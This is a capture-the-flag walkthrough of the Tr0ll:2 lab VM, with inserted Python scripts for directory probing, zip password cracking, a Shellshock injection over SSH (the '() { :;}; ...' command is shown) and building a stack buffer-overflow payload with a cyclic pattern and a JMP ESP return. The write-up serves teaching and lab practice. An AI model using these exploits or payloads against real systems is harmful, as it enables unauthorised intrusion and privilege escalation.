Tuesday 12 July 2016

Tr0ll:2

Hello,
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)  Difficulty is beginner++ to intermediate.

Scanning
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
Let's begin with the FTP service:
Connected to 192.168.56.101.
220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (192.168.56.101:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
Hmm, we cannot log in as the anonymous user.
Let's browse the web application.

They bother me :-) I opened the robots.txt file and it lists several paths.

Nice, isn't it? I added these paths to a wordlist and ran DirBuster, with the following result:
Dir found: /noob/ - 200
Dir found: /keep_trying/ - 200
Dir found: /ok_this_is_it/ - 200
Dir found: /dont_bother/ - 200
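The robots.txt-to-wordlist step can be scripted instead of pasting entries into DirBuster by hand. The following is an added example, not code from the original write-up: it parses the Disallow/Allow targets out of a robots.txt, then requests each one and keeps those that answer 200. The robots.txt text is constructed for the example (the four real directories are the ones the scan found; the two decoy entries are placeholders, not the decoys the VM actually lists), and the lab address 192.168.56.101 is the one used in the write-up.

```python
"""Turn robots.txt Disallow entries into a path wordlist and probe each one.

Added example, not part of the original write-up. SAMPLE_ROBOTS is
CONSTRUCTED: the four real directories come from the scan result above,
the "decoy_*" entries are placeholders standing in for the VM's fake paths.
"""
import urllib.error
import urllib.request
from urllib.parse import urljoin

SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /noob/
Disallow: /keep_trying/
Disallow: /decoy_one/      # placeholder, not a real entry from the VM
Disallow: /ok_this_is_it/
Disallow: /dont_bother/
Disallow: /decoy_two/      # placeholder, not a real entry from the VM
"""


def robots_paths(text):
    """Return the unique Disallow/Allow targets of a robots.txt, in file order.

    Comments are stripped, an empty Disallow (which means "block nothing")
    and a bare "/" are skipped, and duplicates are dropped.
    """
    seen, paths = set(), []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        if key.strip().lower() not in ("disallow", "allow"):
            continue
        value = value.strip()
        if not value or value == "/":
            continue
        if value not in seen:
            seen.add(value)
            paths.append(value)
    return paths


def probe(base_url, paths, timeout=5.0):
    """GET each path and record its HTTP status (None if the host is unreachable).

    This is the check DirBuster performed above: a 200 is a real directory,
    anything else is one of the troll entries.
    """
    results = {}
    for path in paths:
        req = urllib.request.Request(urljoin(base_url, path),
                                     headers={"User-Agent": "Mozilla/5.0"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[path] = resp.status
        except urllib.error.HTTPError as err:
            results[path] = err.code
        except (urllib.error.URLError, OSError):
            results[path] = None
    return results


def live_paths(results):
    """Paths whose probe returned 200."""
    return [path for path, code in results.items() if code == 200]


if __name__ == "__main__":
    wordlist = robots_paths(SAMPLE_ROBOTS)
    print("wordlist:", wordlist)
    # Against the lab host from the write-up (needs network access):
    # print(live_paths(probe("http://192.168.56.101/", wordlist)))
```

The status-code filter is the same one DirBuster applies; the point of doing it in a script is that a robots.txt with dozens of decoys (or several hosts) can be handled in one run.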
OK, so only four of the paths are real. Let's examine them. Hmm, on each path I got this response:

OK, the picture must contain something hidden, I am pretty sure.
The picture from /dont_bother/ has a comment embedded in it:
Look Deep within y0ur_self for the answer
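An embedded comment like this one is easy to miss if you only look at the pixels; exiftool or strings on the file shows it, and so does walking the file's structure directly. The following is an added example (not part of the original write-up) that parses a JPEG's segment table and returns every COM segment. It assumes the picture is a JPEG, which the page does not state, and the sample bytes are a constructed minimal JPEG carrying the quoted message rather than the VM's actual image.

```python
"""Extract embedded comments from a JPEG by walking its marker segments.

Added example, not code from the original write-up. The image format is
ASSUMED to be JPEG (the page does not say). SAMPLE_JPEG is CONSTRUCTED:
a minimal SOI + COM + EOI file carrying the message quoted above.
"""
import struct


def jpeg_comments(data):
    """Return the text of every COM (0xFFFE) segment in `data`, in order.

    A JPEG is a sequence of 0xFF-prefixed markers. Most markers carry a
    2-byte big-endian length that includes itself; RSTn/TEM carry none, and
    after SOS the entropy-coded scan follows until the next real marker
    (0xFF00 is a stuffed byte, 0xFFD0-D7 are restart markers). Comments
    appended after the scan data are therefore still found.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    comments = []
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("lost marker sync at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: end of image
            break
        if marker == 0xFF:                      # fill byte
            pos += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:   # RSTn / TEM: no length field
            pos += 2
            continue
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2:
            raise ValueError("bad segment length at offset %d" % pos)
        if marker == 0xDA:                      # SOS: skip scan data to the next marker
            pos += 2 + length
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
            continue
        if marker == 0xFE:                      # COM
            body = data[pos + 4:pos + 2 + length]
            comments.append(body.decode("latin-1").rstrip("\x00"))
        pos += 2 + length
    return comments


def make_jpeg_with_comment(comment):
    """Build the smallest byte string the parser accepts (used for the constructed sample)."""
    body = comment.encode("latin-1")
    return b"\xff\xd8" + b"\xff\xfe" + struct.pack(">H", len(body) + 2) + body + b"\xff\xd9"


SAMPLE_JPEG = make_jpeg_with_comment("Look Deep within y0ur_self for the answer")

if __name__ == "__main__":
    print(jpeg_comments(SAMPLE_JPEG))
    # For the real file: print(jpeg_comments(open("cat.jpg", "rb").read()))
```

Because the parser follows segment lengths rather than scanning for printable text, it also reports a comment that sits behind megabytes of scan data, where a quick strings | head would scroll it away.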
Hmm, OK, I browsed the /y0ur_self/ directory:

I downloaded the answer.txt file; it contains a lot of base64-encoded lines.
I brute-forced the FTP credentials using the decoded answer.txt as a wordlist, without success. So I wondered what the credentials might look like; I thought of root:root, so maybe Tr0ll:Tr0ll?

Great! Let's download the lmao.zip file and unpack it.

Oops, we need a password... Maybe answer.txt would be useful in this case? A dictionary attack with the decoded lines (the output below is fcrackzip's):
PASSWORD FOUND!!!!: pw == ItCantReallyBeThisEasyRightLOL
Awesome! I unpacked lmao.zip using that password:
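The two steps above, decoding answer.txt into a wordlist and running it against the archive, fit in one short script. This is an added example, not the commands used in the write-up (which relied on a zip cracker for the second step). SAMPLE_ANSWER is constructed: a few base64 lines standing in for answer.txt, one of which decodes to the password the page reports. crack_zip() uses the standard-library zipfile module, which can only decrypt traditional ZipCrypto archives, the same class of archive fcrackzip handles.

```python
"""Decode a file of base64 lines into a wordlist and try it against a zip.

Added example, not the write-up's own commands. SAMPLE_ANSWER is
CONSTRUCTED to stand in for answer.txt; crack_zip() only handles
ZipCrypto (traditional PKWARE) encryption, like fcrackzip.
"""
import base64
import binascii
import zipfile

SAMPLE_ANSWER = "\n".join([
    base64.b64encode(b"noob").decode(),
    base64.b64encode(b"keep_trying").decode(),
    "not!base64",                                          # garbage line, must be skipped
    base64.b64encode(b"ItCantReallyBeThisEasyRightLOL").decode(),
    base64.b64encode(b"\xff\xfe binary junk").decode(),    # decodes, but is not text
])


def decode_lines(text):
    """Base64-decode every line; keep unique printable ASCII results in file order.

    Lines that are not valid base64, or decode to non-text bytes, are dropped
    rather than aborting the run, since answer.txt mixes words with noise.
    """
    words = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            raw = base64.b64decode(line, validate=True)
        except (binascii.Error, ValueError):
            continue
        try:
            word = raw.decode("ascii")
        except UnicodeDecodeError:
            continue
        if word and word.isprintable() and word not in words:
            words.append(word)
    return words


def crack_zip(path, candidates):
    """Return the first candidate that decrypts every member of the archive, else None.

    ZipCrypto verifies a password with a single check byte, so roughly 1 in
    256 wrong passwords passes that test; reading the member to the end
    forces the CRC check (zipfile raises BadZipFile on a mismatch), which is
    what fcrackzip's -u option achieves by calling unzip.
    """
    with zipfile.ZipFile(path) as zf:
        members = [info for info in zf.infolist() if not info.is_dir()]
        if not members:
            return None
        for pw in candidates:
            try:
                for info in members:
                    zf.read(info, pwd=pw.encode())
                return pw
            except (RuntimeError, zipfile.BadZipFile):   # bad password / bad CRC
                continue
    return None


if __name__ == "__main__":
    wordlist = decode_lines(SAMPLE_ANSWER)
    print(len(wordlist), "candidates:", wordlist)
    # print(crack_zip("lmao.zip", wordlist))
```

If the archive turns out to be AES-encrypted (WinZip style), zipfile raises NotImplementedError on read; that case needs a different tool and is not handled here.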

We have got a private key for SSH! Let's try logging in with the key:

I don't know what is going on. Let's use verbose mode:
OpenSSH_7.2p2 Debian-5, OpenSSL 1.0.2h  3 May 2016
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 192.168.56.101 [192.168.56.101] port 22.
debug1: Connection established.
debug1: permanently_set_uid: 0/0
debug1: key_load_public: No such file or directory
debug1: identity file noob type -1
debug1: key_load_public: No such file or directory
debug1: identity file noob-cert type -1
debug1: Enabling compatibility mode for protocol 2.0
debug1: Local version string SSH-2.0-OpenSSH_7.2p2 Debian-5
debug1: Remote protocol version 2.0, remote software version OpenSSH_5.9p1 Debian-5ubuntu1.4
debug1: match: OpenSSH_5.9p1 Debian-5ubuntu1.4 pat OpenSSH_5* compat 0x0c000000
debug1: Authenticating to 192.168.56.101:22 as 'noob'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: ecdh-sha2-nistp256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: kex: client->server cipher: aes128-ctr MAC: umac-64@openssh.com compression: none
debug1: sending SSH2_MSG_KEX_ECDH_INIT
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:I3xuSgcBlIsoldKTkOyVYwx8B4NLGl0fDDTi0H6ExYg
debug1: Host '192.168.56.101' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:4
debug1: rekey after 4294967296 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: rekey after 4294967296 blocks
debug1: SSH2_MSG_NEWKEYS received
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Trying private key: noob
debug1: Authentication succeeded (publickey).
Authenticated to 192.168.56.101 ([192.168.56.101]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: Remote: Forced command.
debug1: Sending environment.
debug1: Sending env LANG = en_US.UTF-8
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
TRY HARDER LOL!
debug1: channel 0: free: client-session, nchannels 1
Connection to 192.168.56.101 closed.
Transferred: sent 2696, received 1712 bytes, in 0.0 seconds
Bytes per second: sent 54430.6, received 34564.2
debug1: Exit status 0
The "debug1: Remote: Forced command." line explains it: the authorized_keys entry for this key carries a command= option, so whatever we ask to run is replaced by a fixed command that prints TRY HARDER LOL! and exits. Googling around that, I found that this may be the Shellshock vulnerability: sshd still hands the client's requested command to the forced command in the SSH_ORIGINAL_COMMAND environment variable, and a vulnerable bash executes the commands that follow a function definition found in any environment variable.
So let's verify our prediction:
root@kali:~# ssh -l noob -i noob  192.168.56.101 '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
TRY HARDER LOL!
Yes, there is Shellshock, so we are able to exploit it.
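What the check above relies on, as an added example that is not part of the original write-up: the client-supplied command becomes the value of SSH_ORIGINAL_COMMAND, and a bash vulnerable to Shellshock (CVE-2014-6271) treats a value starting with "() {" as a function definition and runs whatever follows the closing brace. The script builds that payload, reproduces the exact ssh invocation the page used, and reproduces the bash behaviour locally without SSH by putting the payload in the environment of a local bash; on a patched bash the marker never appears.

```python
"""Shellshock through an SSH forced command, reproduced locally.

Added example, not from the original write-up. The SSH_ORIGINAL_COMMAND
mechanism is standard sshd behaviour; the user, key file and host below are
the ones the page used. local_bash_vulnerable() only exercises the bash on
this machine and makes no network connection.
"""
import os
import shlex
import subprocess


def shellshock_payload(cmd):
    """An empty function definition followed by the command a vulnerable bash will run."""
    return "() { :;}; " + cmd


def ssh_command(user, key, host, cmd):
    """argv for:  ssh -l USER -i KEY HOST '() { :;}; CMD'   (the invocation used above).

    sshd replaces CMD with the forced command but exports CMD unchanged as
    SSH_ORIGINAL_COMMAND, which is how the payload reaches the remote bash.
    """
    return ["ssh", "-l", user, "-i", key, host, shellshock_payload(cmd)]


def local_bash_vulnerable(bash="bash"):
    """True if the local bash executes a Shellshock payload planted in its environment.

    Equivalent to the classic test  env x='() { :;}; echo vulnerable' bash -c :
    but using the variable name sshd would use. Returns None when no bash
    binary is available, so callers can tell "patched" from "not tested".
    """
    env = dict(os.environ)
    env["SSH_ORIGINAL_COMMAND"] = shellshock_payload("echo SHELLSHOCK_MARKER")
    try:
        proc = subprocess.run([bash, "-c", ":"], env=env, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, text=True, timeout=10)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "SHELLSHOCK_MARKER" in proc.stdout


if __name__ == "__main__":
    print(shlex.join(ssh_command("noob", "noob", "192.168.56.101", "id")))
    print("local bash vulnerable:", local_bash_vulnerable())
```

The forced command itself is not the bug; it is the combination of a forced command, a bash login shell, and an unpatched bash that turns the SSH_ORIGINAL_COMMAND variable into a code path. Setting the shell of such an account to something other than bash, or simply patching bash, closes it.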

Great! We have got a limited shell. I went to the /home/noob/ directory and found:

So we need to find the bof file and use a buffer overflow to get root, and it would be over.

I found an interesting file:

Let's try to perform a buffer overflow:

Now we are sure that we have to prepare a buffer overflow payload. To perform this kind of attack we have to know the offset at which the saved return address (the value that ends up in EIP) gets overwritten.

So we know that our payload should be: [268 bytes of padding] + [4-byte EIP overwrite] + [the rest: NOP sled and shellcode, which is where ESP points after the return].
I examined this application and couldn't find a JMP ESP, but we can use CALL EAX.

Good, but unfortunately it does not work :( CALL EAX only helps if EAX happens to hold a pointer into our buffer at the moment the overwritten return address is used, which is not guaranteed. Maybe I am wrong; let's try again to find a JMP ESP.

Wow, there is a JMP ESP after all, so let's generate the appropriate shellcode and execute it locally.
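The offset-finding and payload-assembly steps above, as an added example rather than the write-up's own script. The 268-byte offset is the page's figure; the JMP ESP address and the shellcode are placeholders (the page does not show the address it found, and the shellcode depends on the target), so both are parameters to replace. The pattern functions reproduce the Metasploit-style cyclic pattern so the crash value seen in EIP maps straight to an offset.

```python
"""Find the saved-EIP offset with a cyclic pattern and assemble the overflow payload.

Added example, not the write-up's own script. OFFSET is the page's 268;
JMP_ESP is a PLACEHOLDER address and SHELLCODE a stand-in (four int3
instructions): substitute the gadget address and shellcode you actually use.
"""
import string
import struct


def pattern_create(length):
    """Metasploit-style pattern Aa0Aa1...: every 4-byte window is unique for up to 20280 bytes."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern_create supports at most 20280 bytes")


def pattern_offset(value, length=20280):
    """Offset of a crash-time EIP value (int as shown by the debugger, or 4 raw bytes) in the pattern.

    x86 is little-endian, so an EIP of 0x41326141 means the bytes "Aa2A" sat at that position.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def build_payload(offset, ret_addr, shellcode, nops=16):
    """[offset bytes of filler] + [little-endian return address] + [NOP sled] + [shellcode].

    After the function returns through a JMP ESP gadget, ESP points at the
    byte right after the saved EIP, i.e. at the NOP sled, so execution slides
    into the shellcode. A NUL anywhere in the input would end a strcpy-style
    copy early, so both the address and the shellcode are checked for it.
    """
    ret = struct.pack("<I", ret_addr)
    if b"\x00" in ret:
        raise ValueError("return address contains a NUL byte")
    if b"\x00" in shellcode:
        raise ValueError("shellcode contains a NUL byte")
    return b"A" * offset + ret + b"\x90" * nops + shellcode


OFFSET = 268                  # from the write-up
JMP_ESP = 0xDEADBEEF          # PLACEHOLDER: the page does not show the gadget address
SHELLCODE = b"\xcc" * 4       # stand-in (int3 x4); replace with real shellcode

if __name__ == "__main__":
    crash_input = pattern_create(300)
    eip_at_crash = crash_input[OFFSET:OFFSET + 4]   # what the debugger would show in EIP
    print("offset:", pattern_offset(eip_at_crash))
    payload = build_payload(OFFSET, JMP_ESP, SHELLCODE)
    print(len(payload), "bytes")
    # e.g. write the payload to a file and run:  ./bof "$(cat payload.bin)"
```

When testing locally, remember that the address of the JMP ESP gadget must come from the binary or a non-randomised library on the target; an address read from a stack or heap region changes between runs if ASLR is on.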